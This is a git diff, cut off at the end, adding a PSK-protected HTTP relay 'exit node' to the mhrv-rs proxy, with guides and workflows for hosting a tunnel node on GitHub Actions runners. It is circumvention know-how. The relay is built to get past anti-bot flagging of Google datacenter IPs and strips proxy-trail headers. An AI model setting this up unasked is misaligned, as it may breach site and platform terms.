+// flag Google datacenter IPs as bots (chatgpt.com, claude.ai, grok.com,
+// many other CF-fronted SaaS). This exit node sits between Apps Script
+// and the destination; the destination sees the exit node's outbound IP
+// (generally not flagged as Google datacenter) and accepts the request.
+//
+// Setup:
+//   1. Pick a host that runs web-standard fetch handlers (e.g. Deno
+//      Deploy, fly.io with a thin server wrapper, or any cheap VPS
+//      running Deno / Node + this script as a handler).
+//   2. Paste the contents of this file as the request handler.
+//   3. Set PSK below to a strong secret (`openssl rand -hex 32` from
+//      a terminal — DO NOT leave the placeholder in production).
+//   4. Deploy and copy the public URL of the deployed handler.
+//   5. In mhrv-rs config.json, add:
+//        "exit_node": {
+//          "enabled": true,
+//          "relay_url": "https://your-deployed-exit-node.example.com",
+//          "psk": "<the same PSK you set above>",
+//          "mode": "selective",
+//          "hosts": ["chatgpt.com", "claude.ai", "x.com", "grok.com"]
+//        }
+//
+// Threat model: PSK is the only thing keeping this from being an open
+// proxy on the public internet. Treat it like a password: do not commit
+// to source control, do not share publicly, rotate if leaked. The exit
+// node refuses all requests that don't carry the matching PSK.
+//
+// Failure mode: if the exit node is unreachable, mhrv-rs falls back to
+// the regular Apps Script relay automatically — the only consequence
+// of an offline exit node is that ChatGPT/Claude/Grok stop working;
+// other sites are unaffected.
+
+const PSK = "CHANGE_ME_TO_A_STRONG_SECRET"; // while unchanged, every request gets a 503
+
+// Client headers that must NOT reach the destination: hop-by-hop / framing
+// ones that would break re-encoding, and proxy-trail ones (x-forwarded-*, via…).
+const STRIP_HEADERS = new Set([
+  "host",
+  "connection",
+  "content-length",
+  "transfer-encoding",
+  "proxy-connection",
+  "proxy-authorization",
+  "x-forwarded-for",
+  "x-forwarded-host",
+  "x-forwarded-proto",
+  "x-forwarded-port",
+  "x-real-ip",
+  "forwarded",
+  "via",
+]);
+
+// Decodes a standard base64 string into raw bytes (atob yields one
+// Latin-1 character per byte, so each char code is the byte value).
+function decodeBase64ToBytes(input: string): Uint8Array {
+  const binary = atob(input);
+  return Uint8Array.from(binary, (ch) => ch.charCodeAt(0));
+}
+
+// Inverse of decodeBase64ToBytes: bytes → Latin-1 binary string → base64.
+function encodeBytesToBase64(bytes: Uint8Array): string {
+  const binary = bytes.reduce((acc, byte) => acc + String.fromCharCode(byte), "");
+  return btoa(binary);
+}
+
+// Copy client headers into a string map, minus empty names and STRIP_HEADERS.
+function sanitizeHeaders(h: unknown): Record<string, string> {
+  const kept: Record<string, string> = {};
+  if (h === null || typeof h !== "object") return kept;
+  Object.entries(h as Record<string, unknown>).forEach(([name, value]) => {
+    const drop = name === "" || STRIP_HEADERS.has(name.toLowerCase());
+    if (!drop) kept[name] = String(value ?? ""); // null / undefined → ""
+  });
+  return kept;
+}
+
+// Request handler: POST a JSON body { k: PSK, u: URL, m?: method, h?: headers,
+// b?: base64 body }. Replies { s, h, b } (status, headers, base64 body) on
+// success, or { e: message } with a 4xx/5xx status on failure.
+export default async function (req: Request): Promise<Response> {
+  // Fail closed on the placeholder PSK so a fresh deploy without setup
+  // can't accidentally serve as an open relay.
+  if (PSK === "CHANGE_ME_TO_A_STRONG_SECRET") {
+    const e =
+      "exit_node misconfigured: PSK is still the placeholder. Set " +
+      "a strong secret in the source before deploying.";
+    return Response.json({ e }, { status: 503 });
+  }
+
+  try {
+    if (req.method !== "POST") {
+      return Response.json({ e: "method_not_allowed" }, { status: 405 });
+    }
+
+    const body = await req.json();
+    if (!body || typeof body !== "object") {
+      return Response.json({ e: "bad_json" }, { status: 400 });
+    }
+
+    const k = String((body as any).k ?? "");
+    const u = String((body as any).u ?? "");
+    const m = String((body as any).m ?? "GET").toUpperCase();
+    const h = sanitizeHeaders((body as any).h);
+    const b64 = (body as any).b;
+
+    if (k !== PSK) {
+      return Response.json({ e: "unauthorized" }, { status: 401 });
+    }
+    if (!/^https?:\/\//i.test(u)) {
+      return Response.json({ e: "bad url" }, { status: 400 });
+    }
+
+    // Loop guard: if u points at this exit node's own host, refuse.
+    // Without this, a misconfigured client could chain exit-node →
+    // exit-node → exit-node → ... and burn the host's runtime budget.
+    // Only the host is compared: behind a TLS-terminating reverse proxy
+    // req.url is typically http:// while the public URL is https://, so
+    // also requiring equal protocols would let such a loop through.
+    try {
+      if (new URL(req.url).host === new URL(u).host) {
+        return Response.json({ e: "exit-node loop refused" }, { status: 400 });
+      }
+    } catch {
+      // Unparseable URL — skip the guard; fetch() below will throw and
+      // the outer catch reports it as a 500.
+    }
+
+    let payload: Uint8Array | undefined;
+    if (typeof b64 === "string" && b64.length > 0) {
+      payload = decodeBase64ToBytes(b64);
+    }
+
+    const resp = await fetch(u, {
+      method: m,
+      headers: h,
+      body: payload,
+      redirect: "manual",
+    });
+
+    // `fetch()` (Deno / Bun / Node) auto-decompresses gzip / br / deflate
+    // responses, so `resp.arrayBuffer()` returns plain bytes — but the
+    // destination's `Content-Encoding` header is still on `resp.headers`.
+    // Forwarding it would tell the client browser "this body is gzipped"
+    // when it isn't, producing `Content Encoding Error` (#964). Same goes
+    // for `Content-Length` — the post-decompression byte count is
+    // different from what the destination announced. Strip both. The
+    // Apps Script + Rust transport layer below us re-frames the wire body
+    // anyway, so neither header is meaningful to forward.
+    const data = new Uint8Array(await resp.arrayBuffer());
+    const respHeaders: Record<string, string> = {};
+    // NOTE(review): if forEach yields a name more than once (e.g. Set-Cookie),
+    // only the last value survives here — confirm the client tolerates that.
+    resp.headers.forEach((value, key) => {
+      const lower = key.toLowerCase();
+      if (lower === "content-encoding" || lower === "content-length") return;
+      respHeaders[key] = value;
+    });
+
+    return Response.json({
+      s: resp.status,
+      h: respHeaders,
+      b: encodeBytesToBase64(data),
+    });
+  } catch (err) {
+    const message = err instanceof Error ? err.message : String(err);
+    return Response.json({ e: message }, { status: 500 });
+  }
+}
diff --git a/assets/exit_node/wrapper.ts b/assets/exit_node/wrapper.ts
new file mode 100644
index 00000000..4c30eb3f
--- /dev/null
+++ b/assets/exit_node/wrapper.ts
@@ -0,0 +1,119 @@
+// VPS wrapper for exit_node.ts — used when you run the exit node on your
+// own server (anything that can run Deno, Bun, or Node 22+) instead of on
+// a platform that auto-invokes the default export (Deno Deploy, Val.town,
+// Cloudflare Workers, etc.).
+//
+// Pick ONE runtime + matching command:
+//
+//   Deno (recommended, HTTPS built in; add --allow-read if using CERT_FILE):
+//     deno run --allow-net --allow-env wrapper.ts
+//
+//   Bun (also works, slightly faster cold start):
+//     bun run wrapper.ts
+//
+//   Node 22+ (no extra runtime; needs `--experimental-fetch` only on <22):
+//     node wrapper.ts                # requires built-in fetch plus the
+//                                    # global Request/Response (22+)
+//
+// ENV VARS (all optional):
+//   PORT       — TCP port to bind. Default 8443.
+//   HOST       — bind address. Default 0.0.0.0 (all interfaces).
+//   CERT_FILE  — path to TLS cert PEM. Omit for plain HTTP (use a reverse
+//                proxy like Caddy / nginx / Cloudflare Tunnel for TLS).
+//   KEY_FILE   — path to TLS key PEM (must be set together with CERT_FILE).
+//
+// Behind a reverse proxy (Caddy, nginx, Cloudflare Tunnel) you typically
+// run this on plain HTTP and let the proxy terminate TLS — that's the
+// simpler setup if you already have a domain. Set PORT=8443 and point
+// your reverse proxy at http://localhost:8443.
+//
+// Standalone TLS (rare but supported): set CERT_FILE + KEY_FILE to
+// matching PEM-encoded files and Deno will terminate TLS itself. Use
+// Let's Encrypt's certbot / acme.sh to fetch a real cert; self-signed
+// will not work (Apps Script's UrlFetchApp validates the chain).
+//
+// EDIT exit_node.ts FIRST: replace the placeholder PSK with a strong
+// secret. The wrapper imports the handler from exit_node.ts directly,
+// so changing the constant in exit_node.ts is all you need.
+
+import handler from "./exit_node.ts";
+
+// Deno (preferred)
+if (typeof (globalThis as any).Deno !== "undefined") {
+  const Deno = (globalThis as any).Deno;
+  const port = Number(Deno.env.get("PORT") ?? 8443);
+  const hostname = Deno.env.get("HOST") ?? "0.0.0.0";
+  const certFile = Deno.env.get("CERT_FILE");
+  const keyFile = Deno.env.get("KEY_FILE");
+
+  if (certFile && keyFile) {
+    // Standalone TLS: both PEM files are read once at startup, which is
+    // why this path additionally needs --allow-read.
+    const cert = Deno.readTextFileSync(certFile);
+    const key = Deno.readTextFileSync(keyFile);
+    Deno.serve({ port, hostname, cert, key }, handler);
+    console.log(`exit_node listening on https://${hostname}:${port}`);
+  } else {
+    const hint = "(no TLS — terminate it with a reverse proxy like Caddy/nginx)";
+    Deno.serve({ port, hostname }, handler);
+    console.log(`exit_node listening on http://${hostname}:${port} ${hint}`);
+  }
+}
+// Bun
+else if (typeof (globalThis as any).Bun !== "undefined") {
+  const Bun = (globalThis as any).Bun;
+  const port = Number(process.env.PORT ?? 8443);
+  const hostname = process.env.HOST ?? "0.0.0.0";
+  const { CERT_FILE, KEY_FILE } = process.env;
+  // TLS is enabled only when both files are configured.
+  const tls = CERT_FILE && KEY_FILE
+    ? { cert: Bun.file(CERT_FILE), key: Bun.file(KEY_FILE) }
+    : undefined;
+
+  Bun.serve({ port, hostname, fetch: handler, tls });
+  console.log(`exit_node listening on ${hostname}:${port}`);
+}
+// Node 22+ — uses the built-in `node:http` module + globalThis.Request/Response.
+// Plain HTTP only: CERT_FILE / KEY_FILE are not read on this path.
+else if (typeof (globalThis as any).process !== "undefined") {
+  const { createServer } = await import("node:http");
+  const port = Number(process.env.PORT ?? 8443);
+  const hostname = process.env.HOST ?? "0.0.0.0";
+
+  createServer(async (req, res) => {
+    try {
+      // Build a web-standard Request from Node's IncomingMessage.
+      const chunks: Uint8Array[] = [];
+      for await (const c of req) chunks.push(c as Uint8Array);
+      const body = chunks.length ? Buffer.concat(chunks) : undefined;
+
+      const url = `http://${req.headers.host ?? hostname}${req.url ?? "/"}`;
+      const webReq = new Request(url, {
+        method: req.method,
+        headers: req.headers as Record<string, string>,
+        body,
+      });
+
+      const webRes = await handler(webReq);
+
+      res.statusCode = webRes.status;
+      webRes.headers.forEach((v: string, k: string) => res.setHeader(k, v));
+      res.end(new Uint8Array(await webRes.arrayBuffer()));
+    } catch (err) {
+      // `new Request` throws on e.g. a GET that carries a body. Left
+      // uncaught, that rejection would be unhandled (fatal by default in
+      // Node) and the client would never get a response.
+      const message = err instanceof Error ? err.message : String(err);
+      if (res.headersSent) return void res.end();
+      res.statusCode = 500;
+      res.setHeader("content-type", "application/json");
+      res.end(JSON.stringify({ e: message }));
+    }
+  }).listen(port, hostname, () => {
+    console.log(`exit_node listening on http://${hostname}:${port}`);
+  });
+} else {
+  throw new Error(
+    "No supported runtime detected. Run this file with Deno, Bun, or Node 22+.",
+  );
+}
diff --git a/assets/github-actions-tunnel/README.md b/assets/github-actions-tunnel/README.md
new file mode 100644
index 00000000..8bb92900
--- /dev/null
+++ b/assets/github-actions-tunnel/README.md
@@ -0,0 +1,129 @@
+# GitHub Actions Full Tunnel
+
+A temporary, repeatable Full tunnel mode for users who cannot or prefer not to
+purchase a VPS. Uses GitHub Actions free hosted runners to run the official
+`mhrv-tunnel-node` container for 6-hour sessions at no cost.
+
+## Who This Is For
+
+- Users who cannot access international payment methods to purchase a VPS
+- Users who need Full tunnel mode occasionally — CAPTCHA-protected sites,
+  streaming, or services that require a real browser
+- Users who want to test Full tunnel mode before committing to a permanent VPS
+- Users in networks where the standard `apps_script` mode is sufficient for
+  daily browsing, but Full mode is needed for specific use cases
+
+## How It Works
+
+1. A GitHub Actions workflow starts the official `mhrv-tunnel-node` Docker
+   container on a free hosted runner
+2. A tunneling service (cloudflared or ngrok) exposes the container to the
+   internet on a public URL
+3. `CodeFull.gs` is configured to forward tunnel traffic to this URL
+4. The runner stays alive for 6 hours, then shuts down automatically
+5. The workflow can be re-triggered at any time for another 6-hour session
+
+## Available Methods
+
+Three methods are provided, ordered by setup complexity. Each is documented in
+its own guide with step-by-step instructions.
+
+| # | Method | Guide | Account Required | URL Behavior | Iran ISP friendly? |
+|---|---|---|---|---|---|
+| 1 | cloudflared Quick Tunnel | [cloudflared-quick.md][quick] | None | New URL each session | ⚠️ See note below |
+| 2 | ngrok Tunnel | [ngrok.md][ngrok] | ngrok (free) | **Permanent URL** | ⚠️ `.dev` TLD blocked on some ISPs |
+| 3 | cloudflared Named Tunnel | [cloudflared-named.md][named] | Cloudflare + domain | **Permanent URL** | ⚠️ See note below |
+
+> **⚠️ ngrok `*.ngrok-free.dev` block (early 2026).** Free-tier ngrok now
+> auto-assigns `*.ngrok-free.dev` domains exclusively for new accounts (the
+> older `*.ngrok-free.app` is grandfathered for existing accounts only and
+> cannot be claimed). Some Iran ISPs (TCI, Irancell, IRMCI confirmed via
+> #924) block `*.ngrok-free.dev` at DNS or TCP. Symptom: `curl` from your
+> network to your ngrok URL times out, but works from a non-Iran machine.
+> Workarounds: try **Method 1 (cloudflared Quick)**, which uses a different
+> TLD, or pay $10/mo for the ngrok Personal plan to get `*.ngrok.app` instead.
+>
+> **⚠️ cloudflared methods may not work from Iran ISP.** Apps Script
+> outbound runs from Google datacenter IPs, which Cloudflare's anti-bot
+> system sometimes flags as bots and serves a 403 / Persian Google Docs
+> error page (#849). cloudflared Methods 1 and 3 may still work for users
+> on networks where Cloudflare's anti-bot heuristics aren't firing against
+> Apps Script's outbound — try them and check.
+
+**New to Full tunnel mode?** Try [Method 2 (ngrok)][ngrok] first — it's the
+fastest setup and gives a permanent URL on the free tier. If `*.ngrok-free.dev`
+is blocked on your ISP (curl times out), switch to [Method 1 (cloudflared
+Quick)][quick] — different TLD, sometimes passes where ngrok's `.dev`
+doesn't. If both fail, see the **Alternative hosts** section below.
+
+**Need a stable URL on a CF-friendly domain?** Use [Method 3][named] — requires
+a one-time Cloudflare CLI setup with your own domain.
+
+## Alternative hosts (when GitHub Actions tunnels don't work)
+
+If both ngrok and cloudflared paths are blocked on your network, run
+`mhrv-tunnel-node` somewhere that doesn't rely on a third-party tunnel:
+
+- **HuggingFace Spaces (Docker SDK)**: free, permanent `*.hf.space` URL,
+  no tunnel layer needed. Create a Space → pick Docker SDK → small
+  Dockerfile that runs `ghcr.io/therealaleph/mhrv-tunnel-node:latest`.
+  16 GB storage, 2 vCPU. Most Iran-friendly option in 2026.
+- **Replit (Deno repl)**: signup with email, free tier. Run
+  `mhrv-tunnel-node` and the Repl exposes a public URL.
+- **Your own VPS**: Hetzner / Vultr / DigitalOcean / ArvanCloud. ~$3-5/mo.
+  See [tunnel-node README](../../tunnel-node/README.md) for Docker setup.
+
+## Shared Requirements
+
+All methods share these requirements:
+
+| Requirement | Details |
+|---|---|
+| GitHub account | Free. Repository must be private to keep secrets secure. |
+| Google account | Free. Used to deploy `CodeFull.gs`. |
+| `CodeFull.gs` deployed | See the main project documentation for deployment instructions. |
+| `TUNNEL_AUTH_KEY` secret | A strong password shared between the workflow and `CodeFull.gs`. |
+
+## After Starting the Tunnel
+
+1. Run the workflow from your repository's **Actions** tab
+2. Copy the `TUNNEL_SERVER_URL` from the workflow log output
+3. Update the `TUNNEL_SERVER_URL` constant in `CodeFull.gs`
+4. Deploy `CodeFull.gs` (Deploy → New Deployment → Web App)
+5. Configure your `mhrv-rs` client to use the new deployment in Full mode
+
+For Method 1 (cloudflared Quick) the URL is fresh every session, so steps 2–4
+must be repeated each time. For Method 2 (ngrok), free-tier accounts now get a
+**static domain** by default — once assigned, the URL is the same across runs
+and `CodeFull.gs` only needs to be updated once. Method 3 uses a permanent
+URL — configure `CodeFull.gs` once and only re-trigger the workflow when
+needed.
+
+## Limitations
+
+- **6-hour maximum per session.** GitHub Actions enforces a 360-minute timeout
+  on hosted runners. Re-trigger the workflow for another session.
+- **URL changes on restart (Method 1).** cloudflared Quick assigns a fresh
+  `*.trycloudflare.com` URL at runtime. `CodeFull.gs` must be updated and
+  redeployed each session. Method 2 (ngrok) keeps the same URL across runs
+  on accounts with a static domain assigned (the free-tier default).
+- **Shared IP ranges.** GitHub-hosted runners share IP ranges with other users.
+  Some websites may already have these IPs flagged (a re-run is sometimes needed).
+- **GitHub Actions terms.** This workflow is intended for occasional personal
+  use. Review [GitHub's Terms for Additional Products and Features][gh-terms]
+  and ensure your usage complies.
+
+## Compliance Note
+
+This workflow uses GitHub-hosted runners for a purpose adjacent to, but not
+directly part of, software development on the repository. Usage is low-burden
+(a single Docker container, moderate outbound traffic for one user) and aligns
+with GitHub's acceptable use guidelines for development and testing
+infrastructure. Continuous, high-bandwidth, or commercial use is not
+recommended. For persistent Full mode operation, a dedicated VPS remains the
+recommended solution.
+
+[quick]: cloudflared-quick.md
+[ngrok]: ngrok.md
+[named]: cloudflared-named.md
+[gh-terms]: https://docs.github.com/en/site-policy/github-terms/github-terms-for-additional-products-and-features#actions
diff --git a/assets/github-actions-tunnel/cloudflared-named.md b/assets/github-actions-tunnel/cloudflared-named.md
new file mode 100644
index 00000000..e43ee2af
--- /dev/null
+++ b/assets/github-actions-tunnel/cloudflared-named.md
@@ -0,0 +1,187 @@
+# cloudflared Named Tunnel
+
+Run a Full tunnel with a **permanent, unchanging URL** using a Cloudflare
+account and a custom domain. The tunnel URL never changes between restarts —
+configure `CodeFull.gs` once and only re-trigger the workflow when needed.
+
+## Prerequisites
+
+- A GitHub account (free)
+- A Cloudflare account with a domain
+- `cloudflared` installed on your local machine for one-time setup
+- `CodeFull.gs` deployed as a Google Apps Script Web App
+
+## One-Time Local Setup
+
+These steps are performed **once** on your local machine. They create a named
+tunnel on Cloudflare and route your domain to it.
+
+### Step 1: Install cloudflared
+
+**Linux (Debian/Ubuntu):**
+```bash
+curl -L --output cloudflared.deb \
+  https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
+sudo dpkg -i cloudflared.deb
+```
+
+**macOS:**
+```bash
+brew install cloudflared
+```
+
+**Windows:**
+Download the installer from the [cloudflared releases page](https://github.com/cloudflare/cloudflared/releases).
+
+### Step 2: Authenticate with Cloudflare
+
+```bash
+cloudflared tunnel login
+```
+
+This opens a browser window. Select your domain and authorize.
+
+### Step 3: Create a Named Tunnel
+
+```bash
+cloudflared tunnel create my-tunnel
+```
+
+This outputs a tunnel ID (a UUID) and creates a credentials file at:
+```
+~/.cloudflared/<TUNNEL_ID>.json
+```
+
+Copy the tunnel ID — you will need it later.
+
+### Step 4: Route Your Domain
+
+```bash
+cloudflared tunnel route dns my-tunnel tunnel.yourdomain.com
+```
+
+Replace `tunnel.yourdomain.com` with the actual subdomain you want to use.
+This creates a DNS record on Cloudflare pointing to your tunnel.
+
+### Step 5: Get the Credentials File
+
+```bash
+cat ~/.cloudflared/<TUNNEL_ID>.json
+```
+
+Copy the entire JSON output. You will use this as the
+`CLOUDFLARE_TUNNEL_CREDENTIALS` secret in GitHub Actions.
+
+## GitHub Setup
+
+### Step 6: Create the Repository
+
+If you already have a repository from another method, you can reuse it.
+Otherwise:
+
+1. Go to [github.com](https://github.com) and sign in
+2. Click the **+** icon in the top-right corner, then **New repository**
+3. Enter a repository name (e.g., `my-tunnel`)
+4. Select **Private** (recommended — keeps your secrets secure)
+5. Click **Create repository**
+
+### Step 7: Add the Secrets
+
+1. In your repository, go to **Settings > Secrets and variables > Actions**
+2. Click **New repository secret** and add each of the following:
+
+   | Name | Value |
+   |---|---|
+   | `TUNNEL_AUTH_KEY` | A strong password. You will also set this in `CodeFull.gs`. |
+   | `CLOUDFLARE_TUNNEL_ID` | The tunnel ID from Step 3. |
+   | `CLOUDFLARE_TUNNEL_HOSTNAME` | The subdomain you configured in Step 4 (e.g., `tunnel.yourdomain.com`). |
+   | `CLOUDFLARE_TUNNEL_CREDENTIALS` | The entire JSON contents of the credentials file from Step 5. |
+
+3. Click **Add secret** for each
+
+### Step 8: Add the Workflow
+
+1. In your repository, go to the **Actions** tab
+2. Click **New workflow**
+3. Click the **set up a workflow yourself** link
+4. Delete the default content and paste the contents of [`cloudflared-named.yml`][here]
+5. Click **Commit changes...**, add a commit message, then click **Commit changes**
+
+The workflow file will be saved to `.github/workflows/cloudflared-named.yml`.
+
+### Step 9: Run the Workflow
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (cloudflared Named)** from the left sidebar
+3. Click **Run workflow > Run workflow**
+
+The workflow will start immediately.
+
+### Step 10: Configure CodeFull.gs
+
+Open `CodeFull.gs` in the Google Apps Script editor and update these constants:
+
+```javascript
+const TUNNEL_SERVER_URL = "https://tunnel.yourdomain.com";
+const TUNNEL_AUTH_KEY = "the-secret-you-set-in-step-7";
+```
+
+Deploy: **Deploy > New Deployment > Web App**.
+Copy the new Deployment ID and update your `mhrv-rs` config.
+
+**This step is performed only once.** The tunnel URL never changes between
+restarts.
+
+### Step 11: Verify
+
+Use `mhrv-rs test` or visit `https://ipleak.net` through your proxy.
+You should see the GitHub runner's IP address rather than your own.
+
+## How It Works
+
+1. GitHub Actions starts a Docker container running `mhrv-tunnel-node` on port
+   `8080`
+2. `cloudflared` connects to Cloudflare using the named tunnel credentials
+3. Cloudflare routes traffic from your custom domain to the runner through a
+   secure, persistent tunnel
+4. `CodeFull.gs` forwards tunnel operations to your custom domain over HTTPS
+5. The runner stays alive for 6 hours, then shuts down automatically
+6. On restart, the same domain routes to the new runner — no configuration
+   changes needed
+
+## Restarting the Tunnel
+
+The tunnel shuts down after 6 hours. To start a new session:
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (cloudflared Named)**
+3. Click **Run workflow > Run workflow**
+
+That is all — the URL is permanent so `CodeFull.gs` does not need to be updated.
+
+For automatic restarts every 6 hours, add a `schedule` trigger to the workflow:
+
+```yaml
+on:
+  workflow_dispatch:
+  schedule:
+    - cron: '0 */6 * * *'
+```
+
+## Limitations
+
+- Requires a one-time local setup with `cloudflared` CLI
+- Requires a Cloudflare account with a domain
+- 6-hour maximum per session (GitHub Actions limit)
+
+## Troubleshooting
+
+| Problem | Solution |
+|---|---|
+| `cloudflared tunnel login` fails | Ensure your browser can reach `dash.cloudflare.com`. You may need to use a proxy or alternative network for this step. |
+| `cloudflared tunnel create` fails | Verify you are authenticated. Run `cloudflared tunnel login` again. |
+| Workflow fails at Docker step | GitHub Actions may be pulling the image for the first time. Wait 2-3 minutes and retry. |
+| `cloudflared` fails to connect | Verify all four secrets are set correctly. Check that `CLOUDFLARE_TUNNEL_CREDENTIALS` contains valid JSON. |
+| `CodeFull.gs` returns 502 or timeout | Verify the workflow is still running. Check that `TUNNEL_AUTH_KEY` matches in both the secret and `CodeFull.gs`. Ensure the DNS record was created in Step 4. |
+
+[here]: cloudflared-named.yml
diff --git a/assets/github-actions-tunnel/cloudflared-named.yml b/assets/github-actions-tunnel/cloudflared-named.yml
new file mode 100644
index 00000000..38f12814
--- /dev/null
+++ b/assets/github-actions-tunnel/cloudflared-named.yml
@@ -0,0 +1,64 @@
+# Runs mhrv-tunnel-node on a GitHub-hosted runner and exposes it through a
+# pre-created Cloudflare named tunnel for the duration of one job.
+name: Full Tunnel (cloudflared Named)
+
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  tunnel:
+    runs-on: ubuntu-latest
+    timeout-minutes: 360
+    steps:
+      - name: Start mhrv-tunnel-node
+        # Secrets reach the shell as environment variables rather than being
+        # pasted into the script text, so quotes or $ in a value cannot alter it.
+        env:
+          TUNNEL_AUTH_KEY: ${{ secrets.TUNNEL_AUTH_KEY }}
+        run: |
+          docker run -d --name mhrv-tunnel \
+            -p 8080:8080 \
+            -e TUNNEL_AUTH_KEY \
+            ghcr.io/therealaleph/mhrv-tunnel-node:latest
+          sleep 5
+          curl -s http://localhost:8080/health || sleep 5
+
+      - name: Install cloudflared
+        run: |
+          curl -L --output cloudflared.deb \
+            https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
+          sudo dpkg -i cloudflared.deb
+
+      - name: Configure tunnel
+        # The credentials secret is JSON, i.e. full of double quotes. Inside a
+        # double-quoted shell string bash would strip them and write invalid
+        # JSON, so the value is passed via env and printed verbatim.
+        env:
+          TUNNEL_CREDENTIALS: ${{ secrets.CLOUDFLARE_TUNNEL_CREDENTIALS }}
+        run: |
+          mkdir -p ~/.cloudflared
+          printf '%s\n' "$TUNNEL_CREDENTIALS" > ~/.cloudflared/credentials.json
+          cat > ~/.cloudflared/config.yml << EOF
+          tunnel: ${{ secrets.CLOUDFLARE_TUNNEL_ID }}
+          credentials-file: /home/runner/.cloudflared/credentials.json
+          ingress:
+            - hostname: ${{ secrets.CLOUDFLARE_TUNNEL_HOSTNAME }}
+              service: http://localhost:8080
+            - service: http_status:404
+          EOF
+
+      - name: Run tunnel
+        run: |
+          cloudflared tunnel --config ~/.cloudflared/config.yml run &
+          echo "TUNNEL_SERVER_URL = https://${{ secrets.CLOUDFLARE_TUNNEL_HOSTNAME }}"
+          # Keep the job alive for 350 minutes, just under the 360-minute timeout.
+          sleep 21000
+
+      - name: Cleanup
+        if: always()
+        run: |
+          docker stop mhrv-tunnel || true
+          pkill cloudflared || true
diff --git a/assets/github-actions-tunnel/cloudflared-quick.md b/assets/github-actions-tunnel/cloudflared-quick.md
new file mode 100644
index 00000000..8d339361
--- /dev/null
+++ b/assets/github-actions-tunnel/cloudflared-quick.md
@@ -0,0 +1,112 @@
+# cloudflared Quick Tunnel
+
+Run a Full tunnel for 6 hours with **zero account setup** beyond GitHub.
+Cloudflare's free Quick Tunnel service provides a temporary public URL — no
+Cloudflare account, no API token, no configuration files required.
+
+## Prerequisites
+
+- A GitHub account (free)
+- `CodeFull.gs` deployed as a Google Apps Script Web App
+- No Cloudflare account or ngrok account needed
+
+## Setup
+
+### Step 1: Create the Repository
+
+1. Go to [github.com](https://github.com) and sign in
+2. Click the **+** icon in the top-right corner, then **New repository**
+3. Enter a repository name (e.g., `my-tunnel`)
+4. Select **Private** (recommended — keeps your secrets secure)
+5. Click **Create repository**
+
+### Step 2: Add the Secret
+
+1. In your new repository, go to **Settings > Secrets and variables > Actions**
+2. Click **New repository secret**
+3. Set **Name** to `TUNNEL_AUTH_KEY`
+4. Set **Value** to a strong password of your choice
+5. Click **Add secret**
+
+You will use this same password later in `CodeFull.gs`.
+
+### Step 3: Add the Workflow
+
+1. In your repository, go to the **Actions** tab
+2. Click **New workflow** (or go to the next step)
+3. Click the **set up a workflow yourself** link
+4. Delete the default content (if any) and paste the contents of `cloudflared-quick.yml` [[here]]
+5. Click **Commit changes...**, add a commit message, then click **Commit changes**
+
+The workflow file will be saved to `.github/workflows/main.yml`.
+(The file name does not matter — you can change it to anything.)
+
+### Step 4: Run the Workflow
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (cloudflared Quick)** from the left sidebar
+3. Click **Run workflow > Run workflow**
+
+The workflow will start immediately.
+
+### Step 5: Get the Tunnel URL
+
+1. Click on the running workflow to see live logs
+2. Open the **Expose tunnel** step and wait about 15 seconds for the URL to be printed (the step itself keeps running for the whole session)
+3. Look for the `::notice::Tunnel URL:` line in the log output
+4. Copy the URL — it will look like `https://random-name.trycloudflare.com`
+
+### Step 6: Configure CodeFull.gs
+
+Open `CodeFull.gs` in the Google Apps Script editor and update these constants:
+
+```javascript
+const TUNNEL_SERVER_URL = "https://random-name.trycloudflare.com";
+const TUNNEL_AUTH_KEY = "the-secret-you-set-in-step-2";
+```
+
+Deploy: **Deploy > New Deployment > Web App**.
+Copy the new Deployment ID and update your `mhrv-rs` config.
+
+### Step 7: Verify
+
+Visit `https://ipleak.net` through your proxy to verify (`mhrv-rs test` only covers the apps_script relay path and refuses to run in Full mode).
+
+## How It Works
+
+1. GitHub Actions starts a Docker container running `mhrv-tunnel-node` on port
+   `8080`
+2. `cloudflared` creates a free Quick Tunnel — a temporary `*.trycloudflare.com`
+   subdomain that routes to `localhost:8080` on the runner
+3. The workflow extracts this URL from the `cloudflared` logs and displays it
+4. `CodeFull.gs` forwards tunnel operations to this URL over HTTPS
+5. The runner stays alive for 6 hours, then shuts down automatically
+
+No DNS configuration, no SSL certificates, no port forwarding — `cloudflared`
+handles everything.
+
+## Renewing the Tunnel
+
+The tunnel shuts down after 6 hours. To start a new session:
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (cloudflared Quick)**
+3. Click **Run workflow > Run workflow**
+4. Copy the **new** tunnel URL from the logs (it changes each time)
+5. Update `TUNNEL_SERVER_URL` in `CodeFull.gs` and redeploy
+
+## Limitations
+
+- The `*.trycloudflare.com` URL changes every time the workflow runs
+- `CodeFull.gs` must be updated and redeployed each session
+- 6-hour maximum per session (GitHub Actions limit)
+
+## Troubleshooting
+
+| Problem | Solution |
+|---|---|
+| Workflow fails at Docker step | GitHub Actions may be pulling the image for the first time. Wait 2-3 minutes and retry. |
+| No tunnel URL appears in logs | Check that the **Expose tunnel** step has started and is still running. The URL is extracted from `cloudflared` output — allow 15 seconds for the tunnel to establish. |
+| `CodeFull.gs` returns 502 or timeout | Verify the tunnel URL is correct and the workflow is still running. Check that `TUNNEL_AUTH_KEY` matches in both the secret and `CodeFull.gs`. |
+
+[here]: cloudflared-quick.yml
diff --git a/assets/github-actions-tunnel/cloudflared-quick.yml b/assets/github-actions-tunnel/cloudflared-quick.yml
new file mode 100644
index 00000000..4bc5b246
--- /dev/null
+++ b/assets/github-actions-tunnel/cloudflared-quick.yml
@@ -0,0 +1,61 @@
+# Runs mhrv-tunnel-node on a GitHub-hosted runner and exposes it through a
+# Cloudflare Quick Tunnel (random *.trycloudflare.com URL) for one job.
+name: Full Tunnel (cloudflared Quick)
+
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  tunnel:
+    runs-on: ubuntu-latest
+    timeout-minutes: 360
+    steps:
+      - name: Start mhrv-tunnel-node
+        # The secret reaches the shell as an environment variable rather than
+        # being pasted into the script text, so quotes or $ in it cannot alter it.
+        env:
+          TUNNEL_AUTH_KEY: ${{ secrets.TUNNEL_AUTH_KEY }}
+        run: |
+          docker run -d --name mhrv-tunnel \
